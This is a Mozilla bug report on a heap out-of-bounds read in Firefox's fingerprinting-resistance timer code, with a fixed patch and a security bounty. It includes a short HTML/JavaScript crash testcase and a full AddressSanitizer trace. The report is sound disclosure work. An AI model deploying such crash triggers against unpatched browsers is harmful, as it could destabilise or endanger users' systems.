Closed
Bug 1442984
Opened 6 years ago
Closed 6 years ago
heap out of bounds read in mozilla::nsRFPService::RandomMidpoint
Categories
(Core :: DOM: Core & HTML, defect)
Tracking
()
RESOLVED
FIXED
mozilla60
Tracking | Status | |
---|---|---|
firefox-esr52 | --- | unaffected |
firefox58 | --- | unaffected |
firefox59 | --- | unaffected |
firefox60 | --- | fixed |
People
(Reporter: nils, Assigned: tjr)
References
Details
(Keywords: csectype-bounds, sec-low)
Attachments
(3 files)
The following testcase crashes the latest ASAN build of Firefox 60.0a1 () when loaded from a HTTP server. crash.html: <script> function start() { o25=document.createElementNS('http://www.w3.org/1999/xhtml','audio'); document.documentElement.appendChild(o25); o53=document.createElementNS('http://www.w3.org/1999/xhtml','iframe'); o53.src='doesnt_exist.svg'; window.top.document.body.appendChild(o53); o25.parentNode.insertBefore(o25.previousSibling,o25.nextSibling); o76=document.createElementNS('http://www.w3.org/1999/xhtml','iframe'); o76.src='doesnt_exist.svg'; window.top.document.body.appendChild(o76); o127=window.top.frames[1]; o128=o127.document; o217=o128.createElementNS('http://www.w3.org/1999/xhtml','li'); o217.appendChild(o53); } </script> <body onload="start()"></body> ASAN output: ================================================================= ==31598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000248654 at pc 0x7f3ff16ac72f bp 0x7ffe4e31b070 sp 0x7ffe4e31b068 READ of size 4 at 0x606000248654 thread T0 (Web Content) #0 0x7f3ff16ac72e in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41 #1 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9 #2 0x7f3fed13023f in mozilla::dom::PerformanceResourceTiming::StartTime() const /builds/worker/workspace/build/src/dom/performance/PerformanceResourceTiming.cpp:51:18 #3 0x7f3fed11cf99 in LessThan /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PerformanceEntry.h:115:42 #4 0x7f3fed11cf99 in operator()<RefPtr<mozilla::dom::PerformanceEntry> > /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:803 #5 0x7f3fed11cf99 in BinarySearchIf<nsTArray_Impl<RefPtr<mozilla::dom::PerformanceEntry>, nsTArrayInfallibleAllocator>, detail::ItemComparatorFirstElementGT<mozilla::dom::PerformanceEntry *&, mozilla::dom::PerformanceEntryComparator> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BinarySearch.h:80 #6 0x7f3fed11cf99 in IndexOfFirstElementGt<mozilla::dom::PerformanceEntry *&, mozilla::dom::PerformanceEntryComparator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1538 #7 0x7f3fed11cf99 in RefPtr<mozilla::dom::PerformanceEntry>* nsTArray_Impl<RefPtr<mozilla::dom::PerformanceEntry>, nsTArrayInfallibleAllocator>::InsertElementSorted<mozilla::dom::PerformanceEntry*&, mozilla::dom::PerformanceEntryComparator, nsTArrayInfallibleAllocator>(mozilla::dom::PerformanceEntry*&, mozilla::dom::PerformanceEntryComparator const&) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1557 #8 0x7f3fed121f20 in InsertResourceEntry /builds/worker/workspace/build/src/dom/performance/Performance.cpp:411:20 #9 0x7f3fed121f20 in mozilla::dom::PerformanceMainThread::AddEntry(nsIHttpChannel*, nsITimedChannel*) /builds/worker/workspace/build/src/dom/performance/PerformanceMainThread.cpp:138 #10 0x7f3fe644f3b9 in mozilla::net::HttpChannelChild::DoPreOnStopRequest(nsresult) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1222:27 #11 0x7f3fe6459b37 in mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&, mozilla::net::ResourceTimingStruct const&, mozilla::net::nsHttpHeaderArray const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1160:3 #12 0x7f3fe6668d00 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12 #13 0x7f3fe66732fe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5 #14 0x7f3fe66732fe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306 #15 0x7f3fe66732fe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161 #16 0x7f3fe59bc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25 #17 0x7f3fe59e4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14 #18 0x7f3fe5a00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10 #19 0x7f3fe68be05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21 #20 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10 #21 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319 #22 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299 #23 0x7f3fed43f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27 #24 0x7f3ff18d29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22 #25 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10 #26 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319 #27 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299 #28 0x7f3ff18d23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34 #29 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30 #30 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280 #31 0x7f4004eaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #32 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48) 0x606000248654 is located 12 bytes to the left of 64-byte region [0x606000248660,0x6060002486a0) allocated by thread T0 (Web Content) here: #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3 #1 0x7f3fe5815281 in Alloc /builds/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:257:22 #2 0x7f3fe5815281 in nsTSubstring<char>::MutatePrep(unsigned int, char**, mozilla::detail::StringDataFlags*) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:166 #3 0x7f3fe582768b in nsTSubstring<char>::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:229:8 #4 0x7f3fe5823ff8 in nsTSubstring<char>::Assign(char const*, unsigned int, std::nothrow_t const&) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:390:8 #5 0x7f3fe5811217 in nsTSubstring<char>::Assign(char const*, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:366:8 #6 0x7f3ff12c2a16 in nsCryptoHash::Finish(bool, nsTSubstring<char>&) /builds/worker/workspace/build/src/security/manager/ssl/nsCryptoHash.cpp:190:11 #7 0x7f3ff16abf41 in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:405:19 #8 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9 #9 0x7f3fed133a2e in mozilla::dom::PerformanceTimingData::PerformanceTimingData(nsITimedChannel*, nsIHttpChannel*, double) /builds/worker/workspace/build/src/dom/performance/PerformanceTiming.cpp:116:15 #10 0x7f3fed1227f9 in mozilla::dom::PerformanceTimingData::Create(nsITimedChannel*, nsIHttpChannel*, double, nsTSubstring<char16_t>&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/dom/performance/PerformanceTiming.cpp:72:14 #11 0x7f3fed121dd2 in mozilla::dom::PerformanceMainThread::AddEntry(nsIHttpChannel*, nsITimedChannel*) /builds/worker/workspace/build/src/dom/performance/PerformanceMainThread.cpp:125:5 #12 0x7f3fe644f3b9 in mozilla::net::HttpChannelChild::DoPreOnStopRequest(nsresult) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1222:27 #13 0x7f3fe6459b37 in mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&, mozilla::net::ResourceTimingStruct const&, mozilla::net::nsHttpHeaderArray const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1160:3 #14 0x7f3fe6668d00 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12 #15 0x7f3fe66732fe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5 #16 0x7f3fe66732fe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306 #17 0x7f3fe66732fe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161 #18 0x7f3fe59bc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25 #19 0x7f3fe59e4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14 #20 0x7f3fe5a00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10 #21 0x7f3fe68be05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21 #22 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10 #23 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319 #24 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299 #25 0x7f3fed43f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27 #26 0x7f3ff18d29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22 #27 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10 #28 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319 #29 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299 #30 0x7f3ff18d23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34 #31 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30 #32 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280 #33 0x7f4004eaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41 in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) Shadow bytes around the buggy address: 0x0c0c80041070: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c80041080: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c80041090: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 0x0c0c800410a0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c800410b0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa =>0x0c0c800410c0: 00 00 00 00 00 00 00 00 fa fa[fa]fa 00 00 00 00 0x0c0c800410d0: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c800410e0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c800410f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c0c80041100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c80041110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==31598==ABORTING
Assignee | ||
Comment 3•6 years ago
|
||
I think the title was a typo?
Summary: heap-use-after-free in mozilla::nsRFPService::RandomMidpoint → heap out of bounds read in mozilla::nsRFPService::RandomMidpoint
Assignee | ||
Comment 4•6 years ago
|
||
Assignee: nobody → tom
Attachment #8956171 -
Flags: review?(amarchesini)
Updated•6 years ago
|
Attachment #8956171 -
Flags: review?(amarchesini) → review+
Assignee | ||
Updated•6 years ago
|
Keywords: checkin-needed
Comment 5•6 years ago
|
||
https://hg.mozilla.org/integration/mozilla-inbound/rev/7376ba7d44f18b85ddbe0718498626d7165e9669
Keywords: checkin-needed
Comment 7•6 years ago
|
||
https://hg.mozilla.org/mozilla-central/rev/7376ba7d44f1
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla60
Updated•6 years ago
|
status-firefox58:
--- → unaffected
status-firefox59:
--- → unaffected
status-firefox-esr52:
--- → unaffected
Updated•6 years ago
|
Flags: sec-bounty?
Updated•6 years ago
|
Flags: sec-bounty? → sec-bounty+
Keywords: csectype-bounds,
sec-high
Comment 8•6 years ago
|
||
Although out of bounds, what we're reading here is a numeric value that is used in a time calculation. We may end up with incorrect time fuzziness (maybe even time going backwards? Is that double-checked later or assumed good from the array?) but doesn't seem worse than that.
Updated•6 years ago
|
Group: core-security → core-security-release
Updated•6 years ago
|
Group: core-security-release
Updated•5 years ago
|
Component: DOM → DOM: Core & HTML
You need to log in
before you can comment on or make changes to this bug.
Description
•